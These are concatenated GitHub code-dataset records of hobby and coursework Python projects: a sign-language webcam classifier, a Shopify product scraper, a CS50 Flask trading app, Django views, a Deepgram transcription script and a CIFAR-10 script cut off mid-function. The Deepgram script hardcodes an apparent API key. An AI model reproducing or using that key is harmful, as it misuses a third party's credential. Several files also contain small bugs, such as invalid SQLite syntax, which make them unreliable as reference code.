project/KNNRecommender.py","file_name":"KNNRecommender.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34641920865","text":"import cv2\nimport numpy as np\nimport sys\nfrom skimage import exposure\nfrom skimage import feature\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.model_selection import cross_val_score\n\n\nf = open('sign.txt','w+')\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\ndef LBP(image, eps=1e-7, numPoints=32, radius=8):\n # compute the Local Binary Pattern representation\n # of the image, and then use the LBP representation\n # to build the histogram of patterns\n lbp = feature.local_binary_pattern(image, numPoints,radius, method=\"uniform\")\n (hist, _) = np.histogram(lbp.ravel(), bins=np.arange(0, numPoints + 3), range=(0, numPoints + 2))\n # normalize the histogram\n hist = hist.astype(\"float\")\n hist /= (hist.sum() + eps)\n\n # return the histogram of Local Binary Patterns\n return hist\n\n\ndf = pd.read_csv('datasetToLearn.csv',header=None)\nX = df.iloc[:,:-1] \nY = df.iloc[:,-1] \netc = ExtraTreesClassifier(n_estimators=1000)\nscores = cross_val_score(etc, X, Y, cv=10)\nprint('Extra Tree',\"Mean CV Score: {:.3f}\".format(scores.mean()))\netc.fit(X, Y)\n\ncap = cv2.VideoCapture(0)\nwhile(1):\n #Capture frames from the camera\n ret, frame = cap.read()\n #img = cv2.flip(frame,1)\n img=frame.copy()\n kernel = np.ones((5,5),np.uint8)\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray,(5,5),0)\n frameHSV = cv2.cvtColor(img,cv2.COLOR_BGR2YCR_CB) \n\n skin_min = np.array([0,133,77],np.uint8) #100, 133, 100\n skin_max = np.array([255,173,127],np.uint8) #255, 255, 255 \n\n #Thresholding based on skin color\n threshSkinColor = cv2.inRange(frameHSV, skin_min, skin_max)\n #Closing and Opening the image to eliminate internal noise\n threshSkinColor = cv2.morphologyEx(threshSkinColor, cv2.MORPH_CLOSE, kernel)\n threshSkinColor = cv2.morphologyEx(threshSkinColor, cv2.MORPH_OPEN, kernel)\n\n _,contours, hierarchy = cv2.findContours(threshSkinColor,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n max_area = 0\n for i in range(len(contours)):\n cnt=contours[i]\n area = cv2.contourArea(cnt)\n if(area>max_area):\n max_area=area\n ci=i\n cnt=contours[ci]\n\n if('cnt' in globals()):\n #Hand Mask is initially made using skin color alone\n handMask = np.zeros(img.shape[:2],np.uint8)\n cv2.fillPoly(handMask, pts =[cnt], color=(255,255,255))\n handMask = cv2.inRange(handMask, 1, 255)\n res = cv2.bitwise_and(img,img,mask = handMask)\n x,y,w,h = cv2.boundingRect(cnt) \n crop_img = res[y:y+h, x:x+w]\n crop_img = cv2.resize(crop_img, (64,64)) \n \n \n gray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY) \n #LBPfeatures = LBP(gray) \n #HOG\n (H, hogImage) = feature.hog(gray,orientations=9, pixels_per_cell=(8, 8),cells_per_block=(2, 2), transform_sqrt=True, visualise=True)\n hogImage = exposure.rescale_intensity(hogImage, out_range=(0, 255))\n hogImage = hogImage.astype(\"uint8\")\n #showImage(hogImage,1,\"HOG\")\n cv2.imshow(\"HOG\",hogImage)\n HOGfeatures = np.ravel(hogImage)\n \n #features = np.append(HOGfeatures,LBPfeatures)\n predicted = etc.predict([HOGfeatures])\n #showImage(res,2,\"Final answer\")\n cv2.putText(res,str(predicted),(100,100),font,2,(255,255,255),2)\n \n cv2.imshow(\"Final\",res)\n k = cv2.waitKey(5) & 0xFF\n \n if k == 27:\n f.write(str(predicted))\n \n if(predicted == 5):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()\nf.close()\n\"\"\"\nhull = cv2.convexHull(cnt,returnPoints = False) \n #hull2 = cv2.convexHull(cnts,returnPoints = False)\n defects = cv2.convexityDefects(cnt,hull)\n print(defects.shape)\"\"\"\n","repo_name":"aravindhank11/Sign-Language-Recognition","sub_path":"CODES/realTimePrediction.py","file_name":"realTimePrediction.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"24728471930","text":"#function to find the keys based on the value in the dictionaryObject\r\ndef getKeysByValue(dictionaryObject, valueToFind):\r\n listOfKeys = list()\r\n listOfItems = dictionaryObject.items()\r\n for item in listOfItems:\r\n if item[1] == valueToFind:\r\n listOfKeys.append(item[0])\r\n return listOfKeys\r\n\r\n#Program\r\nimport csv \r\ninputFiles=['Input1.csv','Input2.csv','Input3.csv']\r\nfor iFile in inputFiles:\r\n # instantiating variables i as int, inputDictionary, computedDictionary as dictionary objects, temp as empty string object.\r\n #Instantiated dictionary object is by default an empty list\r\n groupIndex, inputDictionary, computedDictionary, temp=0,{},{},'';\r\n print(\"--------------------------------------------------------------------------------\")\r\n print(\"----------------------- START OF {} TEST FILE -----------------------------\".format(iFile))\r\n # Open input file in read mode, assumption is the input file is a legal, csv formatted.\r\n with open(iFile, 'r') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n # next(csvreader) # UnComment this line if the input file has file header\r\n for row in csvreader: \r\n #Read each row as key value pair dictionary object with Key as ID, and value as entire row. \r\n inputDictionary[row[0]]=row\r\n #codeblock to create computedDictionary object, with key as ID, and Value as FIRSTNAMELASTNAME\r\n temp=row[1]\r\n if (temp.count(\"^\")>1): \r\n computedDictionary[row[0]]=temp[0:temp.rindex(\"^\")].replace(\"^\",\"\").upper() \r\n else :\r\n computedDictionary[row[0]]=temp.replace(\"^\",\"\").upper()\r\n\t #Using set to get only uniqueValues\r\n uniquePatients = set(computedDictionary.values())\r\n\t #Iterating through each value/patient from list of UniquePatients/Values\r\n for patient in uniquePatients:\r\n\t\t#Print groupIndex to match the expected output\r\n print(\"{} :\".format(groupIndex))\r\n groupIndex+=1\r\n\t\t#Call to function to get the uniqueKeys by Value in the dictionaryObject\r\n listOfKeys = getKeysByValue(computedDictionary, patient)\r\n for key in listOfKeys:\r\n print(inputDictionary[key])\r\n print(\"----------------------- END OF {} TEST INPUT FILE -----------------------------\".format(iFile))\r\n print(\"--------------------------------------------------------------------------------\")\r\n ","repo_name":"crathan/DataChallenge","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34575881490","text":"\"\"\"\nAuthor: Youssef Abbas \nGitHuv : https://github.com/jooabbas99\nShopify Products scrapping \n\nHOW TO USE : \npython3 shopify_scraper.py [DOMAIN]\n\"\"\"\nimport sys\nimport requests\nimport json\nif __name__ == '__main__':\n domian = sys.argv[1]\n products = []\n i = 1\n while(True):\n url = f'https://{domian}/products.json?limit=250&page={i}'\n data = requests.get(url)\n if len(data.json()['products']) == 0:\n break\n json_data = data.json()\n\n for j in json_data['products']:\n products.append(j)\n i += 1 \n print('items found : ' + str(len(products)))\n with open(f'{domian}_products.json', 'w') as f:\n json.dump(products, f)\n \n","repo_name":"jooabbas99/shopify-scrapping","sub_path":"shppify_scraper.py","file_name":"shppify_scraper.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"40642226793","text":"import os\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, jsonify, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom datetime import datetime\n\nfrom helpers import apology, login_required, lookup, usd, format_datetime\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n# Ensure responses aren't cached\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\napp.jinja_env.filters[\"datetime\"] = format_datetime\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\n# code-first set-up for the database\nsql_setup_queries = [\"\"\"\\\n CREATE TABLE IF NOT EXISTS users(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n username TEXT NOT NULL UNIQUE,\n hash TEXT NOT NULL,\n cash NUMERIC NOT NULL DEFAULT 10000.00\n )\"\"\",\n \"\"\"\\\n CREATE TABLE IF NOT EXISTS exchanges(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n name VARCHAR(255) UNIQUE NOT NULL\n )\"\"\",\n \"\"\"\\\n CREATE TABLE IF NOT EXISTS symbols(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n symbol CHAR(25) NOT NULL,\n exchange_id INTEGER NOT NULL,\n FOREIGN KEY(exchange_id) REFERENCES exchanges(id)\n )\"\"\",\n \"\"\"\\\n CREATE TABLE IF NOT EXISTS purchases(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n shares INTEGER NOT NULL,\n price DOUBLE PRECISION NOT NULL,\n transaction_date DATETIME DEFAULT CURRENT_TIMESTAMP,\n symbol_id INTEGER NOT NULL,\n user_id INTEGER NOT NULL,\n FOREIGN KEY(symbol_id) REFERENCES symbols(id),\n FOREIGN KEY(user_id) REFERENCES users(id)\n )\"\"\",\n \"\"\"\\\n INSERT INTO exchanges ( name )\n SELECT 'IEX Cloud' WHERE NOT EXISTS(SELECT * FROM exchanges WHERE name='IEX Cloud')\n\"\"\"]\n\nfor query in sql_setup_queries:\n db.execute(query)\n\n# Make sure API key is set\nif not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n\n\n@app.route(\"/\")\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n user_summary = get_user_summary()\n\n if user_summary:\n return render_template(\"index.html\", summary=user_summary[\"summary\"], cash=user_summary[\"cash\"], total_stock_value=user_summary[\"total_stock_value\"], total_value=user_summary[\"total_value\"])\n else:\n return apology(\"Server error\", 500)\n\n\n@app.route(\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == \"POST\":\n errors = []\n symbol = request.form.get(\"symbol\")\n exchange_name = 'IEX Cloud'\n\n # convert the query param to an integer\n try:\n shares = int(request.form.get(\"shares\"))\n except ValueError:\n # if an invalid string (e.g. alphabetic, fractional)\n # define shares as None so the error gets logged below\n shares = None\n\n if not symbol:\n errors.append(\"Please enter the symbol of a stock to purchase\")\n if not shares or shares <= 0:\n errors.append(\"Please enter a positive integer of shares to purchase\")\n\n # display any form validation errors\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n # call lookup to check that the symbol price and\n quote = lookup(symbol)\n\n if not quote:\n errors.append(\"Please enter a valid stock symbol\")\n else:\n # now spend the resources to get the user data from the db\n user = get_user_by_id(session.get(\"user_id\"))\n\n # calculate the total cost of the requested purchase\n # and reject if user does not have the available funds\n total_cost = shares * quote[\"price\"]\n if user[\"cash\"] < total_cost:\n errors.append(\"Insufficient funds\")\n\n # complex errors\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n # insert the purchase into the user's buy table\n # and update their total cash on hand\n newTotal = user[\"cash\"] - total_cost\n insert_purchase((shares, quote, exchange_name), user)\n\n # update the user's cash record\n update_cash(-(shares * quote[\"price\"]), user)\n\n # redirect so user can see the new purchase in the history table\n return redirect(\"/buy\")\n else:\n user_summary = get_user_summary()\n if user_summary:\n return render_template(\"buy.html\", summary=user_summary[\"summary\"], cash=user_summary[\"cash\"], total_stock_value=user_summary[\"total_stock_value\"], total_value=user_summary[\"total_value\"])\n else:\n return apology(\"Server Error\", 500)\n\n\n@app.route(\"/check\", methods=[\"GET\"])\ndef check():\n \"\"\"Return true if username available, else false, in JSON format\"\"\"\n username = request.args.get(\"username\").strip()\n result = False\n\n if len(username) > 0:\n query_result = db.execute(\"SELECT COUNT(*) AS count FROM users WHERE username = :qUsername\", qUsername=username)[0]\n if query_result[\"count\"] == 0:\n result = True\n\n return jsonify(result)\n\n\n@app.route(\"/history\")\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n user = get_user_by_id(session.get(\"user_id\"))\n history_query = \"\"\"SELECT s.symbol AS symbol, p.shares AS shares, p.price AS price, p.transaction_date AS date FROM purchases AS p\n INNER JOIN symbols AS s ON s.id = p.symbol_id\n WHERE user_id = :qUserId\n ORDER BY p.transaction_date DESC\"\"\"\n history = db.execute(history_query, qUserId=user[\"id\"])\n\n for purchase in history:\n purchase[\"value\"] = purchase[\"price\"] * purchase[\"shares\"]\n purchase[\"date\"] = datetime.strptime(purchase[\"date\"], \"%Y-%m-%d %H:%M:%S\")\n\n return render_template('/history.html', history=history)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 400)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n\n # Query database for username\n user = get_user_by_username(request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if not user or not check_password_hash(user[\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\", 400)\n\n # Remember which user has logged in\n session[\"user_id\"] = user[\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\n@app.route(\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == \"POST\":\n q = request.form.get(\"symbol\").strip()\n results = [] # using a list in anticipation that there might be some way to do more of a 'search' method in the future\n error = \"\"\n\n # if no query, then there's no sense in asking the database\n if q:\n from_api = lookup(q)\n\n if from_api:\n results.append(from_api)\n else:\n error = \"Stock ticker symbol required\"\n\n if not error and len(results) == 0:\n error = \"Invalid stock ticker\"\n\n if error:\n return apology(error, 400)\n\n return render_template(\"quote.html\", query=q, results=results)\n else:\n return render_template(\"quote.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == \"POST\":\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n confirmation = request.form.get(\"confirmation\")\n errors = []\n\n if not username:\n errors.append(\"Username is required\")\n elif get_user_by_username(username):\n errors.append(\"Username is already taken\")\n\n if not password:\n errors.append(\"Password is required\")\n if not confirmation:\n errors.append(\"Password confirmation required\")\n if password and confirmation and password != confirmation:\n errors.append(\"Password and confirmation did not match\")\n\n # if any form errors exist return them as an apology page\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n # otherwise no errors, so insert the new user\n db.execute(\"INSERT INTO users (username, hash) VALUES (:qUsername, :qHash)\",\n qUsername=username, qHash=generate_password_hash(password))\n\n # and log them in\n return login()\n else:\n return render_template(\"register.html\")\n\n\n@app.route(\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n\n if request.method == \"POST\":\n symbol = request.form.get(\"symbol\")\n exchange_name = 'IEX Cloud'\n shares = int(request.form.get(\"shares\"))\n errors = []\n\n # validate the form fields and return errors if necessary\n if not symbol:\n errors.append(\"Please enter a symbol\")\n if not shares or shares <= 0:\n errors.append(\"Please enter a positive number of shares to sell\")\n\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n user_id = session.get(\"user_id\")\n query = \"\"\"SELECT s.symbol AS symbol, SUM(p.shares) AS total_shares FROM purchases AS p\n INNER JOIN symbols AS s ON s.id = p.symbol_id\n WHERE s.symbol = :qSymbol AND p.user_id = :qUserId\n GROUP BY p.symbol_id\n HAVING SUM(p.shares) > :qQuantity\"\"\"\n existing_shares = db.execute(query, qQuantity=shares, qSymbol=symbol, qUserId=user_id)\n\n if len(existing_shares) == 0:\n return apology(\"You do not have enough shares to sell\", 400)\n\n # retrieve current price\n quote = lookup(symbol)\n if quote:\n # add the sales 'purchase' record (aka purchase of USD)\n user = get_user_by_id(user_id)\n purchase_details = (-shares, quote, exchange_name)\n insert_purchase(purchase_details, user)\n\n # update the user's cash record\n update_cash(shares * quote[\"price\"], user)\n\n # return render_template(\"sell.html\")\n return redirect(\"/sell\")\n else:\n user_summary = get_user_summary()\n if user_summary:\n return render_template(\"sell.html\", summary=user_summary[\"summary\"], cash=user_summary[\"cash\"], total_stock_value=user_summary[\"total_stock_value\"], total_value=user_summary[\"total_value\"])\n else:\n return apology(\"Server Error\", 500)\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\n# Listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n\n\ndef get_user_by_username(username):\n rows = db.execute(\"SELECT * FROM users WHERE username = :qUsername\", qUsername=username)\n\n if len(rows) != 1:\n return None\n else:\n return rows[0]\n\n\ndef get_user_by_id(id):\n rows = db.execute(\"SELECT * FROM users WHERE id = :qId\", qId=id)\n\n if len(rows) != 1:\n return None\n else:\n return rows[0]\n\n\n# during a purchas add will be negative in order to subtract the total cost from cash\ndef update_cash(add, user):\n new_value = user[\"cash\"] + add\n db.execute(\"UPDATE users SET cash = :qNewCash WHERE id = :qUserId\", qNewCash=new_value, qUserId=user[\"id\"])\n\n\n# accepts a tuple of the purchase details and the user_id to assign\n# the purchase to\ndef insert_purchase(details, user):\n shares, quote, exchange_name = details\n\n # get the symbol id\n symbol = quote[\"symbol\"]\n symbol_id = get_symbol_id(symbol, exchange_name)\n\n # insert the new purhase record\n db.execute(\"INSERT INTO purchases ( shares, price, symbol_id, user_id ) VALUES ( :qShares, :qPrice, :qSymbolId, :qUserId )\",\n qShares=shares, qPrice=quote[\"price\"], qSymbolId=symbol_id, qUserId=user[\"id\"])\n\n\n# TODO update with transactions and table locks\n# gets the symbol id from the database; inserts the symbol and exchange if necessary\ndef get_symbol_id(symbol, exchange):\n exchange_id = get_exchange_id(exchange)\n rows = db.execute(\"SELECT id FROM symbols WHERE symbol = :qSymbol AND exchange_id = :qExchangeId\",\n qSymbol=symbol, qExchangeId=exchange_id)\n\n if len(rows) == 0:\n symbol_id = db.execute(\"INSERT INTO symbols ( symbol, exchange_id ) VALUES ( :qSymbol, :qExchangeId )\",\n qSymbol=symbol, qExchangeId=exchange_id)\n elif len(rows) == 1:\n symbol_id = rows[0][\"id\"]\n else:\n return apology(\"A database error occurred with the symbol\", 500)\n\n return symbol_id\n\n\n# gets the exchange id from the database; inserts the exchange if necessary\ndef get_exchange_id(exchange_name):\n rows = db.execute(\"SELECT id FROM exchanges WHERE name = :qName\", qName=exchange_name)\n\n if len(rows) == 0:\n exchange_id = db.execute(\"INSERT INTO exchanges ( name ) OUTPUT Inserted.ID VALUES ( :qName )\", qName=exchange_name)\n elif len(rows) == 1:\n exchange_id = rows[0][\"id\"]\n else:\n return apology(\"A database error occurred with the exchange\", 500)\n\n return exchange_id\n\n\n# returns a financial summary for the user as a dict\ndef get_user_summary():\n user = get_user_by_id(session.get(\"user_id\"))\n\n if user:\n summary_query = \"\"\"SELECT symbol.id, symbol.symbol AS symbol, SUM(purchase.shares) AS shares FROM purchases AS purchase\n INNER JOIN symbols AS symbol ON symbol.id = purchase.symbol_id\n WHERE purchase.user_id = :qUserId\n GROUP BY purchase.symbol_id\n HAVING SUM(purchase.shares) > 0\"\"\"\n summary = db.execute(summary_query, qUserId=user[\"id\"])\n\n # calculate the current total stock value across all stocks\n total_stock_value = 0\n\n for row in summary:\n quote = lookup(row[\"symbol\"])\n\n if quote:\n row[\"value\"] = quote[\"price\"] * row[\"shares\"]\n total_stock_value += row[\"value\"]\n row[\"company_name\"] = quote[\"name\"]\n row[\"price\"] = quote[\"price\"]\n\n total_value = user[\"cash\"] + total_stock_value\n\n return {\n \"summary\": summary,\n \"cash\": user[\"cash\"],\n \"total_stock_value\": total_stock_value,\n \"total_value\": total_value\n }\n else:\n return None","repo_name":"murskyfuller/cs50","sub_path":"lecture 8/problem set/finance/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":15848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26087720985","text":"from strategies import Strategy\nfrom indicators.EMA import EMA\nfrom indicators.ATR import ATR\nfrom common.instruments import Bar\nfrom common.base import Order\nimport logging\n\nclass BasicEma(Strategy):\n STRATEGY_NAME = 'BasicEma'\n\n def __init__(self):\n self._logger = logging.getLogger('basicEma')\n\n def start(self, engine):\n self.logger.info('Starts')\n self._name = BasicEma.STRATEGY_NAME\n\n # setup the indicators\n self._ema_short = EMA(12, Bar.CLOSE) # 12\n self._ema_long = EMA(26, Bar.CLOSE) # 26\n self._atr = ATR(12, Bar.CLOSE)\n\n def newBar(self, instrument, cur_index):\n # update indicators\n self.ema_short.update(instrument, cur_index)\n self.ema_long.update(instrument, cur_index)\n self.atr.update(instrument, cur_index)\n\n def execute(self, engine, instruments, cur_index):\n atr = self.atr.getLast()\n if atr:\n # Go through all instruments\n for instrument in instruments.itervalues():\n order = None\n take_proffit = atr * 3\n stop_loss = atr * 1\n units = 100\n # crossing up\n if self.ema_short.crossUp(self.ema_long):\n order = Order(engine, instrument, cur_index, units, Order.BUY, take_proffit, stop_loss)\n # crossing down\n elif self.ema_short.crossDown(self.ema_long):\n order = Order(engine, instrument, cur_index, units, Order.SELL, take_proffit, stop_loss)\n\n # make sure theres no open orders with this instrument\n if order:# and not (engine.existsOrder(order) or engine.existsOppositeOrder(order)):\n engine.createOrder(order)\n\n def end(self, engine):\n self.logger.info('Ends')\n pass\n\n # -------------------------------- properties -------------------\n\n @property\n def logger(self):\n return self._logger\n\n @property\n def name(self):\n return self._name\n\n @property\n def ema_short(self):\n return self._ema_short\n\n @property\n def ema_long(self):\n return self._ema_long\n\n @property\n def atr(self):\n return self._atr","repo_name":"acanalda/pytrader","sub_path":"strategies/basicEma.py","file_name":"basicEma.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31931934223","text":"# CASE STUDY\n# Zomato with python storage containers\n\n\npromo_codes = [\"WELCOME50\", \"ZOMPAYTM\", \"BINGO\", \"JUMBO\"]\n\ndish1 = {\n \"name\": \"Aloo tikki\",\n \"price\": 100,\n \"ratings\": 3.7\n\n}\n\ndish2 = {\n \"name\": \"Mcpuff\",\n \"price\": 150,\n \"ratings\": 3.9\n}\n\ndish3 = {\n \"name\": \"Mcveggie wrap\",\n \"price\": 240,\n \"ratings\": 4.7\n\n}\nmenu = [dish1, dish2, dish3, {\"name\": \"McEgg\", \"price\": 300, \"ratings\": 5.1}]\nrestaurant = {\n \"name\": \"McDonalds\",\n \"Address\": \"Ansal Plaza, Ludhiana\",\n \"description\": \"Burger , fast food\",\n \"ratings\": 4.5,\n \"menu\": menu,\n \"promo_codes\": promo_codes\n}\n\nprint(restaurant)\n","repo_name":"Dashyam/GWPDS","sub_path":"Session2D.py","file_name":"Session2D.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19540470681","text":"from django.shortcuts import render, redirect\nfrom .models import Animal\nfrom services.models import PontoAcesso, Depoimento\nfrom .forms import AnimalForm, MotivoForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required \nfrom accounts.models import Perfil\nfrom services.forms import ContatoForm\nfrom .utils import filtro_animal, paginacao\n\ndef lista_animal(request):\n categorias = {}\n ids = []\n lista_de_animais = Animal.objects.all()\n\n if request.method == 'POST':\n lista_de_animais = filtro_animal(request, lista_de_animais)\n\n animais = paginacao(request, lista_de_animais)\n \n #transformando as categorias em dicionário para trabalhar com javascript\n for animal in lista_de_animais:\n categorias[animal.id] = animal.categoria\n ids.append(animal.id)\n\n contexto = {\n 'animais': animais,\n 'categorias': categorias,\n 'ids': ids,\n }\n return render(request, 'index.html', contexto)\n\n\n@login_required\ndef cadastro_animal(request):\n\n form = AnimalForm(request.POST or None, request.FILES)\n\n if request.method == 'POST' and form.is_valid():\n try:\n user = User.objects.get(id=request.user.id)\n animal = form.save(commit=False)\n animal.usuario = user\n animal.save()\n return redirect('cadastro-motivo', animal.id)\n except:\n return HttpResponse(status=500)\n\n return render(request, 'cadastro-animal.html', {'form':form})\n\n@login_required\ndef cadastro_motivo(request, id):\n form = MotivoForm(request.POST or None)\n \n if request.method == 'POST' and form.is_valid():\n try:\n animal = Animal.objects.get(id=id)\n motivo = form.save(commit=False)\n motivo.animal_id = animal\n motivo.save()\n return redirect('/')\n except:\n return HttpResponse(status=500)\n\n return render(request, 'motivo.html', {'form':form}) \n\ndef contato(request):\n\n form = ContatoForm(request.POST or None)\n\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('/')\n\n contexto = {\n 'form':form\n }\n\n return render(request, 'entre-em-contato.html', contexto)\n\n\ndef doe(request):\n pontos = PontoAcesso.objects.exclude(tipo_ponto='PA')\n \n contexto = {\n 'pontos':pontos\n }\n\n return render(request, 'doe.html', contexto)\n\ndef incentivo(request):\n pontos = PontoAcesso.objects.exclude(tipo_ponto='PD')\n depoimentos = Depoimento.objects.all()\n\n contexto = {\n 'pontos':pontos,\n 'depoimentos': depoimentos,\n }\n\n return render(request, 'incentivo.html', contexto)\n \ndef sobre(request):\n return render(request, 'sobre.html')\n\ndef handler404(request, exception):\n return render(request, 'erro.html')\n\ndef handler500(request):\n return render(request, 'erro.html')","repo_name":"LuizFelipeGondim/AUline","sub_path":"publications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17038867583","text":"import sys\nimport asyncio\nfrom deepgram import Deepgram\nimport json\n\nDEEPGRAM_API_KEY = 'e9312877e73293d229ed0e89fffc093ca7e420dd'\nFILE = 'cume.wav'\nMIMETYPE = 'audio/wav'\n\nasync def main():\n deepgram = Deepgram(DEEPGRAM_API_KEY)\n\n if FILE.startswith('http'):\n source = {'url': FILE}\n else:\n audio = open(FILE, 'rb')\n source = {'buffer': audio, 'mimetype': MIMETYPE}\n\n response = await asyncio.create_task(\n deepgram.transcription.prerecorded(\n source,\n {\n 'punctuate': True,\n 'language': 'pt'\n }\n )\n )\n\n words = [\n word['word'] for word in response['results']['channels'][0]['alternatives'][0]['words']\n ]\n\n transcribed_text = ' '.join(words)\n\n with open('transcricao.txt', 'w', encoding='utf-8') as output_file:\n output_file.write(transcribed_text)\n\n print('Transcrição salva em transcricao.txt')\n print(json.dumps(response, indent=4))\n\ntry:\n asyncio.run(main())\nexcept Exception as e:\n exception_type, exception_object, exception_traceback = sys.exc_info()\n line_number = exception_traceback.tb_lineno\n print(f'line {line_number}: {exception_type} - {e}')\n","repo_name":"ASanderO/Leitura-de-PDF","sub_path":"speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40601812362","text":"\n# coding: utf-8\n\n# In[5]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nimport math\nimport random\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split \nimport argparse\nfrom classification_functions import *\n\n\ndef load_preprocess_and_visualize(base_path,fraction):\n #Load data\n train_data,train_labels = load_cf10_data(base_path, type=\"train\")\n test_data, test_labels = load_cf10_data(base_path, type=\"test\")\n assert(len(train_data) == len(train_labels))\n assert(len(test_data) == len(test_labels))\n print(\"Train data shape: {}\".format(train_data.shape))\n print(\"Test data shape: {} \".format(test_data.shape))\n #Visualize data\n \n print(\"Visualizing data......\")\n fig = visualize_cf10(train_data,train_labels)\n fig.suptitle('Samples of cfar10 dataset', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n\n #Plot data\n print(\"Plotting histogram..........\")\n fig = plot_cf10_data(train_labels,test_labels)\n fig.suptitle('Bar Chart of Train and Test Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n\n\n ### Augment training data and display augmented data\n print(\"Running data augmentation........\")\n data,labels = augment_data(train_data,train_labels,fraction)\n train_data = np.vstack((train_data, data))\n train_labels = np.hstack((train_labels,labels))\n assert(len(train_data) == len(train_labels))\n print(\"Augmented Train data shape: {}\".format(train_data.shape))\n print(\"Augemented Train labels shape: {}\".format(train_labels.shape))\n\n print(\"Visualizing augmented data\")\n fig = visualize_cf10(train_data[50000:], train_labels[50000:])\n fig.suptitle('Samples of Augmented Data', fontsize=20)\n 